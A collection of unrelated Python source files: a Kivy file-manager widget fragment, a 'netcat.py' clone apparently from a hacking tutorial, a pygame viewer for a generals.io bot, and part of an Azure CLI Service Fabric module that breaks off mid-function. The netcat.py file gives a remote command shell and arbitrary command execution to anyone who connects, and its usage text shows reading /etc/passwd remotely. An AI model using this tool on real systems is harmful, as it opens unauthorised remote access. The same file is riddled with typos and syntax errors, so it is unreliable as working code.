}
)
else:
for name in dirs:
_path = path + name if path == "/" else path + "/" + name
access_string = self.get_access_string(_path)
if "r" not in access_string:
icon = "folder-lock"
else:
icon = "folder"
manager_list.append(
{
"viewclass": "BodyManager",
"path": _path,
"icon": icon,
"dir_or_file_name": name,
"access_string": access_string,
"events_callback": self.select_dir_or_file,
}
)
for name in files:
_path = path + name if path == "/" else path + "/" + name
manager_list.append(
{
"viewclass": "BodyManager",
"path": _path,
"icon": "file-outline",
"dir_or_file_name": name,
"access_string": self.get_access_string(_path),
"events_callback": self.select_dir_or_file,
}
)
self.ids.rv.data = manager_list
def count_ext(self, path):
ext = os.path.splitext(path)[1]
if ext != "":
if ext.lower() in self.ext or ext.upper() in self.ext:
return True
return False
def get_access_string(self, path):
access_string = ""
if self.use_access:
access_data = {"r": os.R_OK, "w": os.W_OK, "x": os.X_OK}
for access in access_data.keys():
access_string += (
access if os.access(path, access_data[access]) else "-"
)
return access_string
def get_content(self, path):
"""Returns a list of the type [[Folder List], [file list]]."""
try:
files = []
dirs = []
if self.history_flag:
self.history.append(path)
if not self.history_flag:
self.history_flag = True
for content in os.listdir(path):
if os.path.isdir("%s/%s" % (path, content)):
if self.search == "all" or self.search == "dirs":
dirs.append(content)
else:
if self.search == "all" or self.search == "files":
if len(self.ext) != 0:
try:
if self.count_ext(content):
if self.previous:
files.append(
"%s/thumb/thumb_%s"
% (self.app.user_data_dir, content)
)
else:
files.append(content)
except IndexError:
pass
else:
files.append(content)
return dirs, files
except OSError:
self.history.pop()
return None, None
def select_dir_or_file(self, path):
"""Called by tap on the name of the directory or file."""
if os.path.isfile(path):
self.history = []
self.select_path(path)
return
self.current_path = path
self.show(path)
def back(self):
"""Returning to the branch down in the directory tree."""
if len(self.history) == 1:
path, end = os.path.split(self.history[0])
if end == "":
self.exit_manager(1)
return
self.history[0] = path
else:
self.history.pop()
path = self.history[-1]
self.history_flag = False
self.select_dir_or_file(path)
def select_directory_on_press_button(self, *args):
self.history = []
self.select_path(self.current_path)
Builder.load_string(ACTIVITY_MANAGER)
|
netcat.py
|
import argparse
import socket
import shlex
import subprocess
import sys
import textwrap
import threading
def execute(cmd):
cmd = cmd.strip()
if not cmd:
return
output = subprocess.check_output(shlex.split(cmd),stderr=subprocess.STDOUT)
return output.decode()
class NetCat:
def __init__(self,args,buffer=None):
self-args =args
self.buffer
self.socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.socket.setsockopt(socket.SQL_SOCKET, socket.SO_REUSEADDR,1)
def run(self):
if self.args.listen:
self.listen
else :
self.send()
'''
Send: connects to the target and port
recvice data from the target
if EndOfFile brake otherwise contiune the loop intill that
the KeyboardInterrupt occurs
'''
def send(self):
self.socket.connect((self.args.target, self.args.port))
if self.buffer:
self.socket.send(self.buffer)
try:
while True:
recv_len = 1
responswe = ''
while recv_len:
data = self.socket.recv(4096)
response += data.decode()
if recv_len < 4096:
break
if response:
print(response)
buffer += '\n'
self.socket.send(buffer.endcode())
except KeyboardInterrupt:
print('User terminated.')
self.socket.close()
sys.exit()
'''
Listen: Binds the target and the port
and starts listening in a loop, pasing the connected socket
to the handle method
'''
def listen(self):
self.socket.bind((self.args.target, self.args.port))
self.socket.listen(5)
while True:
client_socket, _ = self.socket.accept()
client_thread = threading.Thread(
target=self.handle, args=(client_socket,)
)
client_thread.start()
'''
Handle: Binds the target and the port
and starts listening in a loop, pasing the connected socket
to the handle method
'''
def handle(self, client_socket):
if self.args.execute:
output = execute(self.args.execute)
client_socket.send(output.encode())
elif self.args.upload:
file_buffer = b''
while True:
data = client_socket.recv(4096)
if data:
file_buffer += data
else:
break
with open(self.args.upload, 'wb') as f:
f.write(file_buffer)
message = f'Saved file {self.args.upload}'
client_socket.send(message.encode())
elif self.args.command:
cmd_buffer = b''
while True:
try:
client_socket.send(b'BHP:#<')
while '\n' not in cmd_buffer.decode():
cmd_buffer += client_socket.recv(64)
response = execute (cmd_buffer.decode())
if response:
client_socket.send(response.encode())
cmd_buffer = b''
except Exception as e:
print(f'server killed' {e}')
self.socket.close()
sys.exit())
if _name_ == '_main_':
parser = argparse.ArgumentParser(description='DHP Net Tool',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=textwrap.dedent('''Example: 2
netcat.py -t 192.168.1.108 -p 5555 -l -c # command shell
netcat.py -t 192.168.1.108 -p 5555 -l -u=mytest.txt # upload to file
netcat.py -t 192.168.1.108 -p 5555 -l -e=\"cat /etc/passwd\" # execute command
echo 'ABC' | ./netcat.py -t 192.168.1.108 -p 135 # echo text to server port 135
netcat.py -t 192.168.1.108 -p 5555 # connect to server
'''))
parser.add_argument('-c', '--command', action='store_true', help='command shell')
parser.add_argument('-e', '--execute', help='execute specified command')
parser.add_argument('-l', '--listen', action='store_true', help='listen')
parser.add_argument('-p', '--port', type=int, default=5555, help='specified port')
parser.add_argument('-t', '--target', default='192.168.1.203', help='specified IP')
parser.add_argument('-u', '--upload', help='upload file')
args = parser.parse_args()
if args.listen:
buffer = ''
else:
buffer = sys.stdin.read()
nc = NetCat(args, buffer.encode())
nc.run()
|
viewer.py
|
'''
@ Harris Christiansen (Harris@HarrisChristiansen.com)
January 2016
Generals.io Automated Client - https://github.com/harrischristiansen/generals-bot
Game Viewer
'''
import pygame
import threading
import time
# Color Definitions
BLACK = (0,0,0)
GRAY_DARK = (110,110,110)
GRAY = (160,160,160)
WHITE = (255,255,255)
PLAYER_COLORS = [(255,0,0), (0,0,255), (0,128,0), (128,0,128), (0,128,128), (0,70,0), (128,0,0), (255,165,0), (30,250,30)]
# Table Properies
CELL_WIDTH = 20
CELL_HEIGHT = 20
CELL_MARGIN = 5
SCORES_ROW_HEIGHT = 28
INFO_ROW_HEIGHT = 25
class GeneralsViewer(object):
def __init__(self, name=None):
self._name = name
self._receivedUpdate = False
def updateGrid(self, update):
self._map = update
self._scores = sorted(update.scores, key=lambda general: general['total'], reverse=True) # Sort Scores
self._receivedUpdate = True
if "path" in dir(update):
self._path = [(path.x, path.y) for path in update.path]
else:
self._path = []
if "collect_path" in dir(update):
self._collect_path = [(path.x, path.y) for path in update.collect_path]
else:
self._collect_path = None
def _initViewier(self):
pygame.init()
# Set Window Size
window_height = self._map.rows * (CELL_HEIGHT + CELL_MARGIN) + CELL_MARGIN + SCORES_ROW_HEIGHT + INFO_ROW_HEIGHT
window_width = self._map.cols * (CELL_WIDTH + CELL_MARGIN) + CELL_MARGIN
self._window_size = [window_width, window_height]
self._screen = pygame.display.set_mode(self._window_size)
window_title = "Generals IO Bot"
if (self._name != None):
window_title += " - " + str(self._name)
pygame.display.set_caption(window_title)
self._font = pygame.font.SysFont('Arial', CELL_HEIGHT-10)
self._fontLrg = pygame.font.SysFont('Arial', CELL_HEIGHT)
self._clock = pygame.time.Clock()
def mainViewerLoop(self):
while not self._receivedUpdate: # Wait for first update
time.sleep(0.5)
self._initViewier()
done = False
while not done:
for event in pygame.event.get(): # User did something
if event.type == pygame.QUIT: # User clicked quit
done = True # Flag done
elif event.type == pygame.MOUSEBUTTONDOWN: # Mouse Click
pos = pygame.mouse.get_pos()
# Convert screen to grid coordinates
column = pos[0] // (CELL_WIDTH + CELL_MARGIN)
row = pos[1] // (CELL_HEIGHT + CELL_MARGIN)
print("Click ", pos, "Grid coordinates: ", row, column)
if (self._receivedUpdate):
self._drawGrid()
self._receivedUpdate = False
time.sleep(0.2)
pygame.quit() # Done. Quit pygame.
def _drawGrid(self):
self._screen.fill(BLACK) # Set BG Color
# Draw Info Text
self._screen.blit(self._fontLrg.render("Turn: "+str(self._map.turn), True, WHITE), (10, self._window_size[1]-INFO_ROW_HEIGHT))
# Draw Scores
pos_top = self._window_size[1]-INFO_ROW_HEIGHT-SCORES_ROW_HEIGHT
score_width = self._window_size[0] / len(self._scores)
for i, score in enumerate(self._scores):
score_color = PLAYER_COLORS[int(score['i'])]
if (score['dead'] == True):
score_color = GRAY_DARK
pygame.draw.rect(self._screen, score_color, [score_width*i, pos_top, score_width, SCORES_ROW_HEIGHT])
self._screen.blit(self._font.render(self._map.usernames[int(score['i'])], True, WHITE), (score_width*i+3, pos_top+1))
self._screen.blit(self._font.render(str(score['total'])+" on "+str(score['tiles']), True, WHITE), (score_width*i+3, pos_top+1+self._font.get_height()))
# Draw Grid
for row in range(self._map.rows):
for column in range(self._map.cols):
tile = self._map.grid[row][column]
# Determine BG Color
color = WHITE
color_font = WHITE
if self._map._tile_grid[row][column] == -2: # Mountain
color = BLACK
elif self._map._tile_grid[row][column] == -3: # Fog
color = GRAY
elif self._map._tile_grid[row][column] == -4: # Obstacle
color = GRAY_DARK
elif self._map._tile_grid[row][column] >= 0: # Player
color = PLAYER_COLORS[self._map._tile_grid[row][column]]
else:
color_font = BLACK
pos_left = (CELL_MARGIN + CELL_WIDTH) * column + CELL_MARGIN
pos_top = (CELL_MARGIN + CELL_HEIGHT) * row + CELL_MARGIN
if (tile in self._map.cities or tile in self._map.generals): # City/General
# Draw Circle
pos_left_circle = int(pos_left + (CELL_WIDTH/2))
pos_top_circle = int(pos_top + (CELL_HEIGHT/2))
pygame.draw.circle(self._screen, color, [pos_left_circle, pos_top_circle], int(CELL_WIDTH/2))
else:
# Draw Rect
pygame.draw.rect(self._screen, color, [pos_left, pos_top, CELL_WIDTH, CELL_HEIGHT])
# Draw Text Value
if (tile.army != 0): # Don't draw on empty tiles
textVal = str(tile.army)
self._screen.blit(self._font.render(textVal, True, color_font), (pos_left+2, pos_top+2))
# Draw Path
if (self._path != None and (column,row) in self._path):
self._screen.blit(self._fontLrg.render("*", True, color_font), (pos_left+3, pos_top+3))
if (self._collect_path != None and (column,row) in self._collect_path):
self._screen.blit(self._fontLrg.render("*", True, PLAYER_COLORS[8]), (pos_left+6, pos_top+6))
# Limit to 60 frames per second
self._clock.tick(60)
# Go ahead and update the screen with what we've drawn.
pygame.display.flip()
'''def _create_thread(f):
t = threading.Thread(target=f)
#t.daemon = True
t.start()
def _fakeUpdates():
viewer.updateGrid(maps[0])
time.sleep(1)
viewer.updateGrid(maps[1])
maps = generals_tests.maps
viewer = GeneralsViewer()
_create_thread(_fakeUpdates)
viewer.mainViewerLoop()'''
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long,too-many-lines
import os
import time
from OpenSSL import crypto
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
from azure.cli.core.util import CLIError, get_file_json, b64_to_hex, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac import GraphRbacManagementClient
from azure.cli.core.profiles import ResourceType, get_sdk, get_api_version
from azure.keyvault import KeyVaultAuthentication, KeyVaultClient
from azure.cli.command_modules.servicefabric._arm_deployment_utils import validate_and_deploy_arm_template
from azure.cli.command_modules.servicefabric._sf_utils import _get_resource_group_by_name, _create_resource_group_name
from azure.mgmt.servicefabric.models import (ClusterUpdateParameters,
ClientCertificateThumbprint,
ClientCertificateCommonName,
SettingsSectionDescription,
SettingsParameterDescription,
NodeTypeDescription,
EndpointRangeDescription)
from azure.mgmt.network.models import (PublicIPAddress,
Subnet,
SubResource as NetworkSubResource,
InboundNatPool,
Probe,
PublicIPAddressDnsSettings,
LoadBalancer,
FrontendIPConfiguration,
BackendAddressPool,
LoadBalancingRule)
from azure.mgmt.compute.models import (VaultCertificate,
Sku as ComputeSku,
UpgradePolicy,
ImageReference,
ApiEntityReference,
VaultSecretGroup,
VirtualMachineScaleSetOSDisk,
VirtualMachineScaleSetVMProfile,
VirtualMachineScaleSetExtensionProfile,
VirtualMachineScaleSetOSProfile,
VirtualMachineScaleSetStorageProfile,
VirtualMachineScaleSet,
VirtualMachineScaleSetNetworkConfiguration,
VirtualMachineScaleSetIPConfiguration,
VirtualMachineScaleSetNetworkProfile,
SubResource,
UpgradeMode)
from azure.mgmt.storage.models import StorageAccountCreateParameters
from knack.log import get_logger
from ._client_factory import (resource_client_factory,
keyvault_client_factory,
compute_client_factory,
storage_client_factory,
network_client_factory)
logger = get_logger(__name__)
DEFAULT_ADMIN_USER_NAME = "adminuser"
DEFAULT_SKU = "Standard_D2_V2"
DEFAULT_TIER = "Standard"
DEFAULT_OS = "WindowsServer2016Datacenter"
DEFAULT_CLUSTER_SIZE = 5
DEFAULT_DURABILITY_LEVEL = "Bronze"
DEFAULT_APPLICATION_START_PORT = 20000
DEFAULT_APPLICATION_END_PORT = 30000
DEFAULT_EPHEMERAL_START = 49152
DEFAULT_EPHEMERAL_END = 65534
DEFAULT_CLIENT_CONNECTION_ENDPOINT = 19000
DEFAULT_HTTP_GATEWAY_ENDPOINT = 19080
DEFAULT_TCP_PORT = 19000
DEFAULT_HTTP_PORT = 19080
DEFAULT_FRONTEND_PORT_RANGE_START = 3389
DEFAULT_FRONTEND_PORT_RANGE_END = 4500
DEFAULT_BACKEND_PORT = 3389
SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME = "servicefabricnode"
SERVICE_FABRIC_LINUX_NODE_EXT_NAME = "servicefabriclinuxnode"
SOURCE_VAULT_VALUE = "sourceVaultValue"
CERTIFICATE_THUMBPRINT = "certificateThumbprint"
CERTIFICATE_URL_VALUE = "certificateUrlValue"
SEC_SOURCE_VAULT_VALUE = "secSourceVaultValue"
SEC_CERTIFICATE_THUMBPRINT = "secCertificateThumbprint"
SEC_CERTIFICATE_URL_VALUE = "secCertificateUrlValue"
os_dic = {'WindowsServer2012R2Datacenter': '2012-R2-Datacenter',
'UbuntuServer1604': '16.04-LTS',
'WindowsServer2016DatacenterwithContainers': '2016-Datacenter-with-Containers',
'WindowsServer2016Datacenter': '2016-Datacenter',
'WindowsServer1709': "Datacenter-Core-1709-smalldisk",
'WindowsServer1709withContainers': "Datacenter-Core-1709-with-Containers-smalldisk",
'WindowsServer1803withContainers': "Datacenter-Core-1803-with-Containers-smalldisk",
'WindowsServer1809withContainers': "Datacenter-Core-1809-with-Containers-smalldisk",
'WindowsServer2019Datacenter': "2019-Datacenter",
'WindowsServer2019DatacenterwithContainers': "2019-Datacenter-Core-with-Containers"}
def list_cluster(client, resource_group_name=None):
cluster_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return cluster_list
# pylint:disable=too-many-locals, too-many-statements, too-many-boolean-expressions, too-many-branches
def new_cluster(cmd,
client,
resource_group_name,
location,
certificate_subject_name=None,
parameter_file=None,
template_file=None,
cluster_name=None,
vault_resource_group_name=None,
vault_name=None,
certificate_file=None,
certificate_password=None,
certificate_output_folder=None,
secret_identifier=None,
vm_user_name=None,
vm_password=None,
cluster_size=None,
vm_sku=None,
vm_os=None):
cli_ctx = cmd.cli_ctx
if certificate_subject_name is None and certificate_file is None and secret_identifier is None:
raise CLIError(
'\'--certificate-subject-name\', \'--certificate-file\', \'--secret-identifier\', one of them must be specified')
if certificate_output_folder and certificate_file:
raise CLIError(
'\'--certificate-output-folder\' and \'--certificate-file\' can not be specified at same time')
if secret_identifier:
if certificate_output_folder or certificate_file or certificate_output_folder or vault_resource_group_name or certificate_password:
raise CLIError(
'\'--certificate-output-folder\' , \'--certificate-file\', \'certificate_output_folder\', \'vault_resource_group_name\', \'certificate_password\' can not be specified, ' +
'when \'--secret-identifier\' is specified')
if parameter_file or template_file:
if parameter_file is None or template_file is None:
raise CLIError('If using customize template to deploy,both \'--parameter-file\' and \'--template-file\' can not be None ' + '\n For example:\n az sf cluster create --resource-group myRg --location westus --certificate-subject-name test.com --parameter-file c:\\parameter.json --template-file c:\\template.json' +
'\n az sf cluster create --resource-group myRg --location westus --parameter-file c:\\parameter.json --template-file c:\\template.json --certificate_file c:\\test.pfx' + '\n az sf cluster create --resource-group myRg --location westus --certificate-subject-name test.com --parameter-file c:\\parameter.json --template-file c:\\template.json --certificate-output-folder c:\\certoutput')
if cluster_size or vm_sku or vm_user_name:
raise CLIError('\'cluster_size\',\'vm_sku\',\'vm_os\',\'vm_user_name\' can not be specified when using customize template deployment')
else:
if vm_password is None:
raise CLIError('\'--vm-password\' could not be None')
if cluster_size is None:
cluster_size = DEFAULT_CLUSTER_SIZE
if vm_sku is None:
vm_sku = DEFAULT_SKU
if vm_os is None:
vm_os = DEFAULT_OS
if vm_user_name is None:
vm_user_name = DEFAULT_ADMIN_USER_NAME
rg = _get_resource_group_by_name(cli_ctx, resource_group_name)
if rg is None:
_create_resource_group_name(cli_ctx, resource_group_name, location)
if vault_name is None:
vault_name = resource_group_name
name = ""
for n in vault_name:
if n.isalpha() or n == '-' or n.isdigit():
name += n
if len(name) >= 21:
break
vault_name = name
if vault_resource_group_name is None:
vault_resource_group_name = resource_group_name
if cluster_name is None:
cluster_name = resource_group_name
if certificate_file:
_, file_extension = os.path.splitext(certificate_file)
if file_extension is None or file_extension.lower() != '.pfx'.lower():
raise CLIError('\'--certificate_file\' should be a valid pfx file')
vault_id = None
certificate_uri = None
cert_thumbprint = None
output_file = None
if parameter_file is None:
vm_os = os_dic[vm_os]
reliability_level = _get_reliability_level(cluster_size)
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
vault_id = result[0]
certificate_uri = result[1]
cert_thumbprint = result[2]
output_file = result[3]
linux = None
if vm_os == '16.04-LTS':
linux = True
template = _modify_template(linux)
parameters = _set_parameters_for_default_template(cluster_location=location,
cluster_name=cluster_name,
admin_password=vm_password,
certificate_thumbprint=cert_thumbprint,
vault_id=vault_id,
certificate_id=certificate_uri,
reliability_level=reliability_level,
admin_name=vm_user_name,
cluster_size=cluster_size,
durability_level=DEFAULT_DURABILITY_LEVEL,
vm_sku=vm_sku,
os_type=vm_os,
linux=linux)
else:
parameters, output_file = _set_parameters_for_customize_template(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier,
parameter_file)
vault_id = parameters[SOURCE_VAULT_VALUE]['value']
certificate_uri = parameters[CERTIFICATE_URL_VALUE]['value']
cert_thumbprint = parameters[CERTIFICATE_THUMBPRINT]['value']
template = get_file_json(template_file)
validate_and_deploy_arm_template(cmd, resource_group_name, template, parameters)
output_dict = {}
output_dict['vm_user_name'] = vm_user_name
output_dict['cluster'] = client.get(resource_group_name, cluster_name)
output_dict['certificate'] = {'certificate_file': output_file,
'vault_id': vault_id,
'certificate_identifier': certificate_uri,
'thumbprint': cert_thumbprint}
return output_dict
def _build_detailed_error(top_error, output_list):
if output_list:
output_list.append(' Inner Error - Code: "{}" Message: "{}"'.format(top_error.code, top_error.message))
else:
output_list.append('Error - Code: "{}" Message: "{}"'.format(top_error.code, top_error.message))
if top_error.details:
for error in top_error.details:
_build_detailed_error(error, output_list)
return output_list
def add_app_cert(cmd,
client,
resource_group_name,
cluster_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
cli_ctx = cmd.cli_ctx
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
_add_cert_to_all_vmss(cli_ctx, resource_group_name, None, result[0], result[1])
return client.get(resource_group_name, cluster_name)
def add_client_cert(client,
resource_group_name,
cluster_name,
is_admin=False,
thumbprint=None,
certificate_common_name=None,
certificate_issuer_thumbprint=None,
admin_client_thumbprints=None,
readonly_client_thumbprints=None,
client_certificate_common_names=None):
if thumbprint:
if certificate_common_name or certificate_issuer_thumbprint or admin_client_thumbprints or readonly_client_thumbprints or client_certificate_common_names:
raise CLIError(
"--thumbprint can only specified alone or with --is-admin")
if certificate_common_name or certificate_issuer_thumbprint:
if certificate_issuer_thumbprint is None or certificate_common_name is None:
raise CLIError(
"Both \'--certificate-common-name\' and \'--certificate-issuer-thumbprint should not be None'")
if thumbprint or admin_client_thumbprints or readonly_client_thumbprints or client_certificate_common_names or is_admin:
raise CLIError(
"Only \'--certificate-common-name\' and \'--certificate-issuer-thumbprint\' can be specified together")
if admin_client_thumbprints or readonly_client_thumbprints:
if thumbprint or certificate_common_name or certificate_issuer_thumbprint or client_certificate_common_names or is_admin:
raise CLIError(
"Only \'--admin-client-thumbprints\' and \'--readonly-client-thumbprints\' can be specified together")
if client_certificate_common_names:
if is_admin or thumbprint or certificate_common_name or certificate_issuer_thumbprint or admin_client_thumbprints or readonly_client_thumbprints: # pylint: disable=too-many-boolean-expressions
raise CLIError(
"\'--client-certificate-commonNames\' can only be specified alone")
cluster = client.get(resource_group_name, cluster_name)
def _add_thumbprint(cluster, is_admin, thumbprint):
remove = []
for t in cluster.client_certificate_thumbprints:
if t.certificate_thumbprint.lower() == thumbprint.lower():
remove.append(t)
for t in remove:
cluster.client_certificate_thumbprints.remove(t)
cluster.client_certificate_thumbprints.append(
ClientCertificateThumbprint(is_admin, thumbprint))
def _add_common_name(cluster, is_admin, certificate_common_name, certificate_issuer_thumbprint):
for t in cluster.client_certificate_common_names:
if t.certificate_common_name.lower() == certificate_common_name.lower() and t.certificate_issuer_thumbprint.lower() == certificate_issuer_thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_common_names.remove(remove)
cluster.client_certificate_common_names.add(ClientCertificateCommonName(
is_admin, certificate_common_name, certificate_issuer_thumbprint))
return cluster.client_certificate_common_names
if thumbprint:
_add_thumbprint(cluster, is_admin, thumbprint)
if admin_client_thumbprints or readonly_client_thumbprints:
if admin_client_thumbprints:
for t in admin_client_thumbprints:
_add_thumbprint(cluster, True, t)
if readonly_client_thumbprints:
for t in readonly_client_thumbprints:
_add_thumbprint(cluster, False, t)
if certificate_common_name:
_add_common_name(cluster, is_admin, certificate_common_name,
certificate_issuer_thumbprint)
if client_certificate_common_names:
for common_name in client_certificate_common_names:
if 'certificateCommonName' in common_name and 'certificateIssuerThumbprint' in common_name and 'isAdmin' in common_name:
cluster.client_certificate_common_names = _add_common_name(
cluster, common_name['isAdmin'], common_name['certificateCommonName'], common_name['certificateIssuerThumbprint'])
else:
raise CLIError('client_certificate_common_names is invalid')
patch_request = ClusterUpdateParameters(client_certificate_thumbprints=cluster.client_certificate_thumbprints,
client_certificate_common_names=cluster.client_certificate_common_names)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_client_cert(client,
resource_group_name,
cluster_name,
thumbprints=None,
certificate_common_name=None,
certificate_issuer_thumbprint=None,
client_certificate_common_names=None):
if thumbprints:
if certificate_common_name or certificate_issuer_thumbprint or client_certificate_common_names:
raise CLIError("--thumbprint can only specified alone")
if certificate_common_name or certificate_issuer_thumbprint:
if certificate_issuer_thumbprint is None or certificate_common_name is None:
raise CLIError(
"Both \'--certificate-common-name\' and \'--certificate-issuer-thumbprint should not be None'")
if thumbprints or client_certificate_common_names:
raise CLIError(
"Only \'--certificate-common-name\' and \'--certificate-issuer-thumbprint\' can be specified together")
if client_certificate_common_names:
if thumbprints or certificate_common_name or certificate_issuer_thumbprint:
raise CLIError(
"\'--client-certificate-commonNames\' can only be specified alone")
cluster = client.get(resource_group_name, cluster_name)
def _remove_thumbprint(cluster, thumbprint):
remove = None
for t in cluster.client_certificate_thumbprints:
if t.certificate_thumbprint.lower() == thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_thumbprints.remove(remove)
return cluster.client_certificate_thumbprints
def _remove_common_name(cluster, certificate_common_name, certificate_issuer_thumbprint):
remove = None
for t in cluster.client_certificate_common_names:
if t.certificate_common_name.lower() == certificate_common_name.lower() and t.certificate_issuer_thumbprint.lower() == certificate_issuer_thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_common_names.remove(remove)
return cluster.certificate_issuer_thumbprint
if isinstance(thumbprints, list) is False:
_remove_thumbprint(cluster, thumbprints)
if isinstance(thumbprints, list) is True:
for t in thumbprints:
cluster.client_certificate_thumbprints = _remove_thumbprint(
cluster, t)
if certificate_common_name:
_remove_common_name(cluster, certificate_common_name,
certificate_issuer_thumbprint)
if client_certificate_common_names:
for common_name in client_certificate_common_names:
if 'certificateCommonName' in common_name and 'certificateIssuerThumbprint' in common_name:
cluster.client_certificate_common_names = _remove_common_name(cluster,
common_name['certificateCommonName'],
common_name['certificateIssuerThumbprint'])
else:
raise CLIError('client_certificate_common_names is invalid')
patch_request = ClusterUpdateParameters(client_certificate_thumbprints=cluster.client_certificate_thumbprints,
client_certificate_common_names=cluster.client_certificate_common_names)
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_cert(cmd,
client,
resource_group_name,
cluster_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
cli_ctx = cmd.cli_ctx
cluster = client.get(resource_group_name, cluster_name)
if cluster.certificate is None:
raise CLIError("Unsecure cluster is not allowed to add certificate")
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
vault_id = result[0]
secret_url = result[1]
thumbprint = result[2]
compute_client = compute_client_factory(cli_ctx)
primary_node_type = [n for n in cluster.node_types if n.is_primary is True][0]
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, primary_node_type.name)
fabric_ext = _get_sf_vm_extension(vmss)
if fabric_ext is None:
raise CLIError("Failed to find service fabric extension")
# add cert and star vmss update
_add_cert_to_all_vmss(cli_ctx, resource_group_name, cluster.cluster_id, vault_id, secret_url, is_cluster_cert=True, thumbprint=thumbprint)
# cluser update
patch_request = ClusterUpdateParameters(certificate=cluster.certificate)
patch_request.certificate.thumbprint_secondary = thumbprint
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_cert(client, resource_group_name, cluster_name, thumbprint):
cluster = client.get(resource_group_name, cluster_name)
if cluster.certificate is None:
raise CLIError("Unsecure cluster is not allowed to remove certificate")
if cluster.certificate.thumbprint_secondary.lower() == thumbprint.lower():
cluster.certificate.thumbprint_secondary = None
else:
if cluster.certificate.thumbprint.lower() == thumbprint.lower():
cluster.certificate.thumbprint = cluster.certificate.thumbprint_secondary
cluster.certificate.thumbprint_secondary = None
else:
raise CLIError(
"Unable to find the certificate with the thumbprint {} in the cluster".format(thumbprint))
patch_request = ClusterUpdateParameters(certificate=cluster.certificate)
patch_request.certificate = cluster.certificate
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_node(cmd, client, resource_group_name, cluster_name, node_type, number_of_nodes_to_add):
cli_ctx = cmd.cli_ctx
number_of_nodes_to_add = int(number_of_nodes_to_add)
if number_of_nodes_to_add <= 0:
raise CLIError("--number-of-nodes-to-add must be greater than 0")
compute_client = compute_client_factory(cli_ctx)
cluster = client.get(resource_group_name, cluster_name)
node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
if node_types is None:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type.name)
vmss.sku.capacity = vmss.sku.capacity + number_of_nodes_to_add
# update vmss
vmss_poll = compute_client.virtual_machine_scale_sets.begin_create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
# update cluster
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_node(cmd, client, resource_group_name, cluster_name, node_type, number_of_nodes_to_remove):
cli_ctx = cmd.cli_ctx
number_of_nodes_to_remove = int(number_of_nodes_to_remove)
if number_of_nodes_to_remove <= 0:
raise CLIError("--number-of-nodes-to-remove must be greater than 0")
compute_client = compute_client_factory(cli_ctx)
cluster = client.get(resource_group_name, cluster_name)
node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
if node_types is None:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
reliability_required_instance_count = _get_target_instance(cluster.reliability_level)
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type.name)
vmss.sku.capacity = vmss.sku.capacity - number_of_nodes_to_remove
if vmss.sku.capacity < reliability_required_instance_count:
raise CLIError("Can't delete node since current reliability level is {} requires at least {} nodes.".format(
cluster.reliability_level,
reliability_required_instance_count))
# update vmss
vmss_poll = compute_client.virtual_machine_scale_sets.begin_create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
# update cluster
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
return client.update(resource_group_name, cluster_name, patch_request)
def update_cluster_durability(cmd, client, resource_group_name, cluster_name, node_type, durability_level):
cli_ctx = cmd.cli_ctx
# get cluster node type durablity
cluster = client.get(resource_group_name, cluster_name)
node_type_refs = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
if not node_type_refs:
raise CLIError("Failed to find the node type in the cluster.")
node_type_ref = node_type_refs[0]
curr_node_type_durability = node_type_ref.durability_level
# get vmss extension durability
compute_client = compute_client_factory(cli_ctx)
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type)
_get_sf_vm_extension(vmss)
fabric_ext_ref = _get_sf_vm_extension(vmss)
if fabric_ext_ref is None:
raise CLIError("Failed to find service fabric extension.")
curr_vmss_durability_level = fabric_ext_ref.settings['durabilityLevel']
# check upgrade
if curr_node_type_durability.lower() != curr_vmss_durability_level.lower():
logger.warning(
